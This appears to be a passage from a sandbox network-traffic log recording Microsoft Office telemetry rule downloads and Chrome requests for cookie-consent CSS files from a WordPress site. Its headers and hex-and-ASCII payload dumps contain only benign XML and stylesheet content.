                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              6192.168.2.64972213.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:00 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 3788
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                              x-ms-request-id: b8a73167-901e-0015-0f59-23b284000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180400Z-17fbfdc98bbvcvlzx1n0fduhm0000000064g00000000bt15
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              7192.168.2.64972413.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:00 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 2980
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                              x-ms-request-id: 509f9858-c01e-00a2-4459-232327000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180400Z-17fbfdc98bbk7nhquz3tfc3wbg000000061000000000ahmy
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              8192.168.2.649727141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC601OUTGET /wp-content/uploads/hummingbird-assets/f953364aee27a43a60234e2b4425cdf5.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:44 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f0-63bf"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 121652
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5aa3b636b2e-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC891INData Raw: 36 33 62 66 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 63 6f 6f 6b 69 65 2d 6c 61 77 2d 69 6e 66 6f 2c 63 6f 6f 6b 69 65 2d 6c 61 77 2d 69 6e 66 6f 2d 67 64 70 72 2a 2a 2f 0d 0a 23 63 6f 6f 6b 69 65 2d 6c 61 77 2d 69 6e 66 6f 2d 62 61 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 39 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 6c 65 66 74 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 62 6f 78 2d 73 68 61 64 6f 77 3a
                                                                                                                                                                                                                              Data Ascii: 63bf/**handles:cookie-law-info,cookie-law-info-gdpr**/#cookie-law-info-bar{font-size:15px;margin:0 auto;padding:12px 10px;position:absolute;text-align:center;box-sizing:border-box;width:100%;z-index:9999;display:none;left:0;font-weight:300;box-shadow:
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 7a 65 3a 31 31 70 78 7d 2e 63 6c 69 2d 70 6c 75 67 69 6e 2d 62 75 74 74 6f 6e 2c 2e 63 6c 69 2d 70 6c 75 67 69 6e 2d 62 75 74 74 6f 6e 3a 76 69 73 69 74 65 64 2c 2e 6d 65 64 69 75 6d 2e 63 6c 69 2d 70 6c 75 67 69 6e 2d 62 75 74 74 6f 6e 2c 2e 6d 65 64 69 75 6d 2e 63 6c 69 2d 70 6c 75 67 69 6e 2d 62 75 74 74 6f 6e 3a 76 69 73 69 74 65 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 2e 6c 61 72 67 65 2e 63 6c 69 2d 70 6c 75 67 69 6e 2d 62 75 74 74 6f 6e 2c 2e 6c 61 72 67 65 2e 63 6c 69 2d 70 6c 75 67 69 6e 2d 62 75 74 74 6f 6e 3a 76 69 73 69 74 65 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 34 70 78 20 39 70 78 7d 2e 73
                                                                                                                                                                                                                              Data Ascii: ze:11px}.cli-plugin-button,.cli-plugin-button:visited,.medium.cli-plugin-button,.medium.cli-plugin-button:visited{font-size:13px;font-weight:400;line-height:1}.large.cli-plugin-button,.large.cli-plugin-button:visited{font-size:14px;padding:8px 14px 9px}.s
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 72 64 65 72 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 2e 63 6c 69 2d 70 6f 77 65 72 65 64 5f 62 79 5f 70 7b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6c 69 2d 70 6f 77 65 72 65 64 5f 62 79 5f 61 7b 63 6f 6c 6f 72 3a 23 33 33 33 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73
                                                                                                                                                                                                                              Data Ascii: rder-radius:30px;padding:20px}.cli-powered_by_p{width:100%!important;display:block!important;color:#333;clear:both;font-style:italic!important;font-size:12px!important;margin-top:15px!important}.cli-powered_by_a{color:#333;font-weight:600!important;font-s
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 7d 2e 6d 6f 64 61 6c 2d 62 61 63 6b 64 72 6f 70 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 31 30 33 39 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 6d 6f 64 61 6c 2d 62 61 63 6b 64 72 6f 70 2e 66 61 64 65 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 6d 6f 64 61 6c 2d 62 61 63 6b 64 72 6f 70 2e 73 68 6f 77 7b 6f 70 61 63 69 74 79 3a 2e 35 7d 2e 67 64 70 72 2d 6d 6f 64 61 6c 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30
                                                                                                                                                                                                                              Data Ascii: nsform:translate(0,0);transform:translate(0,0)}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1039;background-color:#000}.modal-backdrop.fade{opacity:0}.modal-backdrop.show{opacity:.5}.gdpr-modal{position:fixed;top:0;right:0;bottom:0
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 2d 6d 6f 64 61 6c 20 2e 63 6c 6f 73 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 31 30 70 78 3b 74 6f 70 3a 31 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 30 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 30 20 23 66 66 66 7d 2e 67 64 70 72 2d 6d 6f 64 61 6c 20 2e 63 6c 6f 73 65 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 30 7d 2e 67 64
                                                                                                                                                                                                                              Data Ascii: -modal .close{position:absolute;right:10px;top:10px;z-index:1;padding:0;background-color:transparent;border:0;-webkit-appearance:none;font-size:1.5rem;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff}.gdpr-modal .close:focus{outline:0}.gd
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 64 64 69 6e 67 3a 33 30 70 78 7d 2e 6e 61 76 2e 67 64 70 72 2d 6e 61 76 2d 70 69 6c 6c 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 33 66 33 66 33 7d 2e 6e 61 76 2e 67 64 70 72 2d 6e 61 76 2d 70 69 6c 6c 73 20 2e 67 64 70 72 2d 6e 61 76 2d 6c 69 6e 6b 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 37 30 61 64 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 37 30 61 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 2e 35 72 65 6d 20 31 72 65 6d 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 7d 2e 6e 61 76 2e 67 64 70 72 2d 6e 61 76 2d 70 69 6c 6c 73 20 2e 67 64 70 72 2d 6e 61 76 2d 6c 69 6e 6b 2e 61 63 74 69 76 65 2c 2e
                                                                                                                                                                                                                              Data Ascii: dding:30px}.nav.gdpr-nav-pills{background:#f3f3f3}.nav.gdpr-nav-pills .gdpr-nav-link{border:1px solid #0070ad;margin-bottom:10px;color:#0070ad;font-size:14px;display:block;padding:.5rem 1rem;border-radius:.25rem}.nav.gdpr-nav-pills .gdpr-nav-link.active,.
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 31 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 35 70 78 7d 2e 63 6c 69 2d 63 6f 6c 2d 34 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 63 6c 69 2d 63 6f 6c 2d 38 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6c 69 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 73 74 72 65 74 63 68 7b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67
                                                                                                                                                                                                                              Data Ascii: ex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.cli-col-4{-ms-flex:0 0 33.333333%;flex:0 0 33.333333%;max-width:33.333333%}.cli-col-8{-ms-flex:0 0 66.666667%;flex:0 0 66.666667%;max-width:66.666667%}.cli-align-items-stretch{-ms-flex-alig
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 30 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 7d 2e 63 6c 69 2d 6d 6f 64 61 6c 2d 62 61 63 6b 64 72 6f 70 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 31 30 34 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 6c 69 2d 6d 6f 64 61 6c 2d 62 61 63 6b 64 72 6f 70 2e 63 6c 69 2d 66 61 64 65 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 63 6c 69 2d 6d 6f 64 61 6c 2d 62 61 63 6b 64 72 6f 70 2e 63 6c 69 2d 73 68 6f 77 7b 6f 70 61 63 69 74 79 3a 2e 35 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 63 6c 69 2d 6d 6f 64 61 6c 2e 63 6c 69 2d 73 68 6f 77
                                                                                                                                                                                                                              Data Ascii: 0,0);transform:translate(0,0)}.cli-modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000;display:none}.cli-modal-backdrop.cli-fade{opacity:0}.cli-modal-backdrop.cli-show{opacity:.5;display:block}.cli-modal.cli-show
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 30 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 30 20 23 66 66 66 7d 2e 63 6c 69 2d 6d 6f 64 61 6c 20 2e 63 6c 69 2d 6d 6f 64 61 6c 2d 63 6c 6f 73 65 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 30 7d 2e 63 6c 69 2d 73 77 69 74 63 68 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 69 6e 2d 68 65 69 67 68 74 3a
                                                                                                                                                                                                                              Data Ascii: ound-color:transparent!important;border:0;-webkit-appearance:none;font-size:1.5rem;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff}.cli-modal .cli-modal-close:focus{outline:0}.cli-switch{display:inline-block;position:relative;min-height:
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 61 63 61 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 2e 35 72 65 6d 20 31 72 65 6d 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 63 6c 69 2d 6e 61 76 2d 70 69 6c 6c 73 20 2e 63 6c 69 2d 6e 61 76 2d 6c 69 6e 6b 2e 63 6c 69 2d 61 63 74 69 76 65 2c 2e 63 6c 69 2d 6e 61 76 2d 70 69 6c 6c 73 20 2e 63 6c 69 2d 73 68 6f 77 3e 2e 63 6c 69 2d 6e 61 76 2d 6c 69 6e 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 61 63 61 64 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 61 63 61 64 7d 2e 63 6c 69 2d 6e 61 76 2d
                                                                                                                                                                                                                              Data Ascii: margin-bottom:10px;color:#00acad;font-size:14px;display:block;padding:.5rem 1rem;border-radius:.25rem;cursor:pointer}.cli-nav-pills .cli-nav-link.cli-active,.cli-nav-pills .cli-show>.cli-nav-link{background-color:#00acad;border:1px solid #00acad}.cli-nav-


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              9192.168.2.649728141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC601OUTGET /wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC480INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:45 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f1-1114fa"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 613451
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5aa3af10b71-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
